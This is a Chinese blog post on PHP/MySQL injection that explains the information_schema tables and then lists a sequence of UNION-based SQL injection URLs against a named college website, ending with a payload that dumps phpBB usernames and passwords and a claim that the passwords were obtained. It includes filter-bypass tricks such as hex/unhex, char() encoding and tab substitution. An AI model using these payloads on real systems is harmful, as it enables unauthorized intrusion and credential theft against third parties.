php注入

最新推荐文章于 2024-08-04 18:57:33 发布
最新推荐文章于 2024-08-04 18:57:33 发布
阅读量451 收藏
点赞数
分类专栏: 网络安全 文章标签: php schema table hex 数据库 constraints

一 原理分析
我看看mysql5比之前增加的系统数据库information_schema的结构,它是用来存储数据库系统信息的
mysql> use information_schema;
Database changed
mysql> show tables;
+—————————————+
| Tables_in_information_schema |
+—————————————+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| KEY_COLUMN_USAGE |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+—————————————+
这里只挑注射中可以用到的几个表。
| SCHEMATA ――>存储数据库名的,
|——>关键字段:SCHEMA_NAME,表示数据库名称
| TABLES ――>存储表名的
|——>关键字段:TABLE_SCHEMA表示表所属的数据库名称;
TABLE_NAME表示表的名称
| COLUMNS ――>存储字段名的
|——>关键字段:TABLE_SCHEMA表示表所属的数据库名称;
TABLE_NAME表示所属的表的名称
COLUMN_NAME表示字段名
二 注入过程
1 版本号:1:版本号http://lrc.yorkcollege.ac.uk/subjects /display.php?id=64%20union%20select%201,2,3,4,unhex(hex(@@version)),6,7,8,9,10,11 /*(这里用hex unhex绕过错误)

2用户名:2:用户名http://lrc.yorkcollege.ac.uk/subjects/display.php?id=64%20union%20select%201,2,3,4,unhex(hex(user())),6,7,8,9,10,11/*

3数据库名:11:数据库库名:http://lrc.yorkcollege.ac.uk/subjects /display.php?id=64%20union%20select%201,2,3,4,unhex(hex(SCHEMA_NAME)),6,7,8,9,10,11%20from%20information_schema.SCHEMATA%20where%20SCHEMA_NAME%20like%20char(37,105,108,116,95,112,104,112,98,98,37)/* 这里我们找下phpbb的表段。(关键模糊查询,有些库名是很多的。甚至上百,模糊查询可以帮你找到你所希望的。例如:%pass%  %phpbb%等 有用的表)

4段名:4:段名http://lrc.yorkcollege.ac.uk/subjects /display.php?id=64%20union%20all%20select%201,2,3,4,unhex(hex(table_name)),6,7,8,9,10,11%20from%20information_schema.tables%20where%20table_schema=database() /*(这里直接利用查询=database查询与用户有关的段)

5:避免限制limit的:http://lrc.yorkcollege.ac.uk/subjects /display.php?id=64%20union%20all%20select%201,2,3,4,unhex(hex(table_name)),6,7,8,9,10,11%20from%20information_schema.tables%20where%20table_schema=database()%20and%20table_name%20!=%20char(117,115,101,114,115%20) /*(有些情况下limit是被限制的 之类我们可以采用!=来绕过)
6:username:http://lrc.yorkcollege.ac.uk/subjects /display.php?id=64%20union%20all%20select%201,2,3,4,unhex(hex(column_name)),6,7,8,9,10,11%20from%20information_schema.columns%20where%20table_name=char(117,115,101,114,115)%20limit%202,1/*
7:password:http://lrc.yorkcollege.ac.uk/subjects /display.php?id=64%20union%20all%20select%201,2,3,4,unhex(hex(column_name)),6,7,8,9,10,11%20from%20information_schema.columns%20where%20table_name=char(117,115,101,114,115)%20limit%206,1 /*(由于长度问题 这里显示不出来 经试验此表并不重要)
8 容错的:http://lrc.yorkcollege.ac.uk/subjects /display.php?id=-1%20union%09select%091,2,3,4,username,6,7,8,9,10,11%09from%09users /*(大家注意这条语句  很多情况下如果我们id=64 是不行的  这里64可换为-1 两外%20换为%09 多多注意哦 )
9模糊查询:http://lrc.yorkcollege.ac.uk/subjects /display.php?id=64%20union%20all%20select%201,2,3,4,unhex(hex(table_name)),6,7,8,9,10,11%20from%20information_schema.tables%20where%20table_name%20like%20char(37,112,104,112,37)/*
10:结果:http://lrc.yorkcollege.ac.uk/subjects /display.php?id=64+union+select+1,2,3,4,unhex(hex(concat(username,0×3a,user_password))),6,7,8,9,10,11+from+ilt_phpbb.phpbb_users

时间关系 不再补充 关键字段已经爆出 。
用户密码也已经爆出。
关键在于大家对于MY SQL注入错误的一些对待问题。
希望此文可以帮助大家。

leanov
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php注入语句大全.txt
07-18
### PHP注入语句详解 #### 一、PHP注入概述 SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过向Web应用程序提交恶意SQL代码,利用程序设计缺陷执行非预期的查询或命令,进而达到非法访问数据库的目的。PHP作为...
php注入案例
08-03
### PHP注入案例详解 #### 一、PHP注入漏洞概述 **PHP注入**是一种常见的Web安全漏洞,通过在应用程序中插入恶意的SQL代码,攻击者能够操纵数据库查询或执行其他未授权的操作。这种攻击通常发生在输入验证不足的...
手工注入纽约大学
weixin_30672295的博客
03-29 71
一 原理分析我看看mysql5比之前增加的系统数据库information_schema的结构,它是用来存储数据库系统信息的mysql> use information_schema;Database changedmysql> show tables;+—————————————+| Tables_in_information_schema |+————————————...
深度学习CV中常用的数据集
night李的博客
01-13 8537
介绍一些深度学习中CV方面的一些常用的数据集: (一)mnist手写字体数据集: mnist数据是由Google实验室的Corinna Cortes和纽约大学柯朗研究所的YannLeCun建立的一个手写字体数据集,其中训练集包含60000训练的手写数字图片,测试集包含10000张图片,一个训练集的标签集,一个测试集的标签集。 官方地址: http://yann.lecun.com/ex
入侵oracle数据库的一些心得
weixin_30896763的博客
08-24 209
件作者:pt007[at]vip.sina.com版权所有,转载请注明版权 信息来源:邪恶八进制信息安全团队(www.eviloctal.com) 一、先看下面的一个贴子: Oracle数据库是现在很流行的数据库系统,很多大型网站都采用Oracle,它之所以倍受用户喜爱是因为它有以下突出的特点: 1、支持大数据库、多用户的高性能的事务处理。Oracle支持最大数据库,其大小可到几...
PHP代码注入PHP语言常见可注入函数以及PHP代码注入漏洞的利用实例
m0_64378913的博客
06-26 7111
目录1 PHP注入概述2 相关函数与语言结构2.1 eval()函数2.2 assert()函数2.3 preg_replace()函数2.4 call_user_func()函数2.5 动态函数`$a($b)`3 总结 1 PHP注入概述 RCE概念:remote command/code execute,远程命令/代码执行。 PHP代码执行:在WEB中,PHP代码执行是指应用程序过滤不严,用户可用通过请求将代码注入到应用中执行。 PHP代码注入与SQL注入比较: 其注入思想是类似的,均是构造语句绕过服务
PHP注入02】PHP注入漏洞利用实验
Fighting_hawk的博客
02-27 3611
1. 获取网站相关的信息利用PHP漏洞;获取数据库相关内容利用SQL注入漏洞。 2. 掌握漏洞验证及利用的过程。 3. 掌握利用漏洞读写文件及建立后门的过程。
PHP注入01】PHP语言常见可注入函数(eval、assert、preg_replace、call_user_func、$a($b)等)
Fighting_hawk的博客
02-26 3990
1. 掌握PHP语言种几种可能存在注入的函数; 2. 结合SQL注入与XSS漏洞思考PHP注入绕过手法。
PHP系列」PHP E-mail 注入/防止注入
日常笔记/总结/系列知识梳理
04-25 1581
PHP E-mail 注入是一种安全漏洞,攻击者尝试通过向邮件发送功能输入恶意数据,来操纵邮件的头部或内容,从而可能执行未授权的操作或窃取信息。尽管现代的邮件发送库和函数已经对这类攻击有所防范,但了解这种攻击的原理和如何防范它仍然是非常重要的。PHP 防止 E-mail 注入的关键在于对用户输入进行适当的验证和过滤,确保输入的内容不会对邮件发送过程产生负面影响。使用像 PHPMailer 这样的安全邮件发送库可以大大降低 E-mail 注入的风险。函数对用户输入的邮件内容进行了过滤,以防止潜在的注入攻击。
sql注入详解
热门推荐
good good study
05-05 20万+
SQL注入(SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
PHP 代码注入漏洞
Hi~ 土拨鼠
12-15 1934
文章目录PHP 代码注入原理及成因漏洞危害相关函数和语句eval()语言结构assert()函数preg_replace()函数call_user_func()函数动态函数`$a($b)`漏洞利用 PHP 代码注入 PHP 代码注入 属于代码注入漏洞中的一种。 原理及成因 PHP 代码执行(注入)是指(Web 方面)应用程序过滤不严,用户可以通过请求将代码注入到应用中执行。代码执行(注入)类似于SQL注入漏洞,SQLi是将SQL语句注入数据库中执行,而代码执行则是可以把代码注入到应用中最终由服务器运行它。
php 怎么防注入,php 防止注入的几种办法
weixin_42515120的博客
03-26 2031
php教程 防止注入的几种办法其实原来就是我们需要过滤一些我们常见的关键字和符合如:select,insert,update,delete,and,*,等等例子:function inject_check($sql_str) {return eregi('select|insert|update|delete|'|/*|*|../|./|union|into|load_file|outfile',...
PHP注入工具大全-2020.zip
05-18
PHP注入工具大全-2020.zip】这个压缩包集合了多种PHP注入相关的工具,主要针对网络安全领域,特别是PHP应用程序的安全检测与防护。在2020年,随着网络技术的发展,PHP作为广泛使用的服务器端脚本语言,其安全性...
Php注入点构造代码
10-30
### PHP SQL注入点构造代码详解 #### 一、SQL注入概念 SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过在应用程序的输入字段中插入恶意SQL语句来操纵或获取数据库中的数据。这种攻击通常发生在当应用程序...
灵活的php注入.txt
07-18
### 知识点:灵活的PHP注入 #### 一、PHP注入概述 PHP注入是一种常见的Web应用程序安全漏洞,攻击者通过向应用程序提交恶意构造的数据,从而执行非预期的SQL指令,进而获取敏感信息、篡改数据甚至控制整个数据库...
基于PHP+MySQL组合开发的微信活动投票小程序源码系统 带完整的安装代码包以及搭建部署教程
codeji的博客
07-31 343
为了满足这一需求,我们推出了一款基于PHP+MySQL组合开发的微信活动投票小程序源码系统,旨在帮助用户快速搭建和管理投票活动。该系统采用了PHP作为后端开发语言,结合MySQL数据库进行数据存储和管理,确保了系统的稳定性和可扩展性。同时,通过优化数据库查询和索引设计,提高了数据处理的效率,确保了在大量用户同时参与投票时系统的稳定运行。同时,系统还支持多种交互方式,如分享、评论等,增强了用户的参与感和互动性。同时,管理员可以自定义投票选项、设定投票时间、限制投票次数等,确保活动的灵活性和公平性。
[图解]SysML建模电磁轨道炮-01块定义图
最新发布
rolt的专栏
08-04 800
它这个轨道炮领域跟这两个Actor
深入探索:使用PHP开发保利威Polyv云点播服务器API对接实践(一)(点播服务器 API、视频加密、跑马灯防录屏、自定义用户)
漏刻有时数据可视化大屏(PHP&ECHARTS智能化开源软件系统)
08-01 596
屏幕录像是最难防范的一种视频盗版方式,保利威播放器提供的防录屏跑马灯功能,通过设定文字内容(一般是观众的身份ID信息)在视频上不规则滚动,以此来警示盗版者,达到视频版权保护的效果。另外在用户网站中,除了通过登录信息(cookies)验证观众是否有权限访问视频播放页面外,还可以通过保利威播放器验证观众是否有播放某一个视频的权限,从而实现对观众权限的双重验证。保利威接口请求方式,包含post和get两种方式,因此,需要做好两种请求方式的封装函数。
xss漏洞(二,xss靶场搭建以及简单利用)
2302_80280669的博客
08-02 357
使用工具:PHP study,dvwa靶场。
PHP注入防护策略与安全设置
"PHP注入与安全" 在Web开发中,PHP注入是一种常见的安全威胁,它允许攻击者通过输入恶意代码来操纵或控制服务器上的PHP应用程序。本文档主要关注PHP注入的安全规范,提供了一些防范措施。 PHP注入通常是由于不当的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值